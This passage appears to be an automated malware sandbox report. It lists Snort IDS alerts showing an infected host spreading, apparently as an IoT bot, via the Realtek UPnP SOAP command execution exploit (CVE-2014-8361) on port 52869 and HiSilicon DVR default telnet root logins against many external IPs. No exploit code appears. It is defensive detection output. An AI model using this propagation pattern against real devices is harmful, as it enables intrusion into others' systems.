Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60048 -> 45.248.70.202:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60048 -> 45.248.70.202:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60062 -> 45.248.70.202:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.25.167.226:23 -> 192.168.2.23:47976
Source: Traffic	Snort IDS: 716 INFO TELNET access 121.162.243.3:23 -> 192.168.2.23:37590
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37038 -> 45.41.95.95:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37038 -> 45.41.95.95:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 89.237.95.5:23 -> 192.168.2.23:40014
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 89.237.95.5:23 -> 192.168.2.23:40014
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33162 -> 45.154.3.117:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33162 -> 45.154.3.117:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 213.87.35.20:23 -> 192.168.2.23:44448
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 213.87.35.20:23 -> 192.168.2.23:44448
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 60.175.152.13:23 -> 192.168.2.23:36982
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 60.175.152.13:23 -> 192.168.2.23:36982
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33772 -> 91.77.236.93:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33772 -> 91.77.236.93:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33776 -> 91.77.236.93:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52238 -> 45.115.240.241:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52238 -> 45.115.240.241:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52246 -> 45.115.240.241:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 117.25.167.226:23 -> 192.168.2.23:48016
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 165.21.107.114:23 -> 192.168.2.23:60850
Source: Traffic	Snort IDS: 716 INFO TELNET access 91.244.81.150:23 -> 192.168.2.23:36808
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59650 -> 185.235.183.225:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59650 -> 185.235.183.225:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59652 -> 185.235.183.225:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:40318 -> 177.127.96.72:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41954 -> 45.138.69.178:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41954 -> 45.138.69.178:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47184 -> 185.242.234.183:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47184 -> 185.242.234.183:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:40108 -> 89.237.95.5:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 177.127.96.72:23 -> 192.168.2.23:40318
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 177.127.96.72:23 -> 192.168.2.23:40318
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34166 -> 91.227.116.89:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34166 -> 91.227.116.89:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34168 -> 91.227.116.89:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 121.162.243.3:23 -> 192.168.2.23:37706
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 89.237.95.5:23 -> 192.168.2.23:40108
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 89.237.95.5:23 -> 192.168.2.23:40108
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 213.87.35.20:23 -> 192.168.2.23:44550
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 213.87.35.20:23 -> 192.168.2.23:44550
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 165.21.107.114:23 -> 192.168.2.23:60954
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 60.175.152.13:23 -> 192.168.2.23:37100
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 60.175.152.13:23 -> 192.168.2.23:37100
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60028 -> 45.250.173.4:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60028 -> 45.250.173.4:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42872 -> 45.248.70.17:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42872 -> 45.248.70.17:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36572 -> 185.147.57.127:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36572 -> 185.147.57.127:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36576 -> 185.147.57.127:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 165.21.107.114:23 -> 192.168.2.23:32788
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 177.127.96.72:23 -> 192.168.2.23:40434
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 177.127.96.72:23 -> 192.168.2.23:40434
Source: Traffic	Snort IDS: 716 INFO TELNET access 121.162.243.3:23 -> 192.168.2.23:37800
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 213.87.35.20:23 -> 192.168.2.23:44646
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 213.87.35.20:23 -> 192.168.2.23:44646
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 89.237.95.5:23 -> 192.168.2.23:40212
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 89.237.95.5:23 -> 192.168.2.23:40212
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:47932 -> 202.224.243.173:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56110 -> 45.42.93.247:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56110 -> 45.42.93.247:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 123.159.71.227:23 -> 192.168.2.23:51296
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34222 -> 45.41.82.98:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34222 -> 45.41.82.98:52869
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 45.152.50.11: -> 192.168.2.23:
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 60.175.152.13:23 -> 192.168.2.23:37222
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 60.175.152.13:23 -> 192.168.2.23:37222
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40610 -> 45.115.238.154:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40610 -> 45.115.238.154:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 165.21.107.114:23 -> 192.168.2.23:32884
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.23.25.16:23 -> 192.168.2.23:38632
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:44768 -> 213.87.35.20:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56546 -> 185.176.146.135:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56546 -> 185.176.146.135:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 121.162.243.3:23 -> 192.168.2.23:37912
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 213.87.35.20:23 -> 192.168.2.23:44768
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 213.87.35.20:23 -> 192.168.2.23:44768
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57018 -> 45.121.58.71:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57018 -> 45.121.58.71:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.23.25.16:23 -> 192.168.2.23:38662
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 89.237.95.5:23 -> 192.168.2.23:40346
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 89.237.95.5:23 -> 192.168.2.23:40346
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 177.127.96.72:23 -> 192.168.2.23:40574
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 177.127.96.72:23 -> 192.168.2.23:40574
Source: Traffic	Snort IDS: 716 INFO TELNET access 91.244.81.150:23 -> 192.168.2.23:37102
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 165.21.107.114:23 -> 192.168.2.23:32944
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47568 -> 45.33.242.201:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47568 -> 45.33.242.201:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40700 -> 45.127.162.38:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40700 -> 45.127.162.38:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33232 -> 45.120.205.44:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33232 -> 45.120.205.44:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.23.25.16:23 -> 192.168.2.23:38718
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 60.175.152.13:23 -> 192.168.2.23:37340
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 60.175.152.13:23 -> 192.168.2.23:37340
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36076 -> 45.126.229.175:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36076 -> 45.126.229.175:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.23.25.16:23 -> 192.168.2.23:38750
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:37410 -> 220.248.26.227:23
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 220.248.26.227:23 -> 192.168.2.23:37410
Source: Traffic	Snort IDS: 716 INFO TELNET access 121.162.243.3:23 -> 192.168.2.23:38030
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 91.159.55.5: -> 192.168.2.23:
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 223.8.221.175:23 -> 192.168.2.23:46890
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 213.87.35.20:23 -> 192.168.2.23:44870
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 213.87.35.20:23 -> 192.168.2.23:44870
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35728 -> 91.78.147.33:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35728 -> 91.78.147.33:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35746 -> 91.78.147.33:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49292 -> 45.113.201.134:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49292 -> 45.113.201.134:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56886 -> 45.138.71.187:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56886 -> 45.138.71.187:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49350 -> 45.113.201.134:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 89.237.95.5:23 -> 192.168.2.23:40450
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 89.237.95.5:23 -> 192.168.2.23:40450
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 165.21.107.114:23 -> 192.168.2.23:33050
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:48186 -> 202.224.243.173:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.23.25.16:23 -> 192.168.2.23:38824
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:38824 -> 177.23.25.16:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 177.127.96.72:23 -> 192.168.2.23:40698
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 177.127.96.72:23 -> 192.168.2.23:40698
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44670 -> 45.13.245.30:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44670 -> 45.13.245.30:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41402 -> 45.158.20.168:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41402 -> 45.158.20.168:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.23.25.16:23 -> 192.168.2.23:38864
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 60.175.152.13:23 -> 192.168.2.23:37500
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 60.175.152.13:23 -> 192.168.2.23:37500
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43462 -> 45.197.155.245:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43462 -> 45.197.155.245:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 121.162.243.3:23 -> 192.168.2.23:38174
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 213.87.35.20:23 -> 192.168.2.23:45004
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 213.87.35.20:23 -> 192.168.2.23:45004
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.23.25.16:23 -> 192.168.2.23:38932
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 165.21.107.114:23 -> 192.168.2.23:33178
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:38932 -> 177.23.25.16:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 123.159.71.227:23 -> 192.168.2.23:51636
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 89.237.95.5:23 -> 192.168.2.23:40590
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 89.237.95.5:23 -> 192.168.2.23:40590
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47076 -> 45.197.143.250:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47076 -> 45.197.143.250:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47872 -> 185.147.57.200:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47872 -> 185.147.57.200:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49296 -> 185.88.24.112:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49296 -> 185.88.24.112:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47880 -> 185.147.57.200:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49302 -> 185.88.24.112:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57306 -> 91.77.210.217:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57306 -> 91.77.210.217:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57314 -> 91.77.210.217:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48952 -> 45.197.145.254:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48952 -> 45.197.145.254:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38466 -> 45.120.185.12:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38466 -> 45.120.185.12:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.23.25.16:23 -> 192.168.2.23:38996
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 177.127.96.72:23 -> 192.168.2.23:40880
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 177.127.96.72:23 -> 192.168.2.23:40880
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:38996 -> 177.23.25.16:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37406 -> 45.43.228.60:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37406 -> 45.43.228.60:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:37678 -> 60.175.152.13:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 120.157.89.169:23 -> 192.168.2.23:48218
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 120.157.89.169:23 -> 192.168.2.23:48218
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.23.25.16:23 -> 192.168.2.23:39036
Source: Traffic	Snort IDS: 716 INFO TELNET access 121.162.243.3:23 -> 192.168.2.23:38302
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52412 -> 45.138.71.172:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52412 -> 45.138.71.172:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 60.175.152.13:23 -> 192.168.2.23:37678
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 60.175.152.13:23 -> 192.168.2.23:37678
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 213.87.35.20:23 -> 192.168.2.23:45164
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 213.87.35.20:23 -> 192.168.2.23:45164
Source: Traffic	Snort IDS: 716 INFO TELNET access 91.244.81.150:23 -> 192.168.2.23:37476
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 165.21.107.114:23 -> 192.168.2.23:33312
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36076 -> 45.42.81.93:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36076 -> 45.42.81.93:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59234 -> 45.33.251.137:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59234 -> 45.33.251.137:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38086 -> 91.200.122.175:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 177.23.25.16:23 -> 192.168.2.23:39072
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48678 -> 45.123.199.142:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48678 -> 45.123.199.142:52869

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 58390 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58392 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59448 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41488 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42658 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 46468
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37870 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37874 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37870 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37874 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40546 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37870 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57434 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37874 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38796 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36614 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34004 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36616 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34028 -> 52869
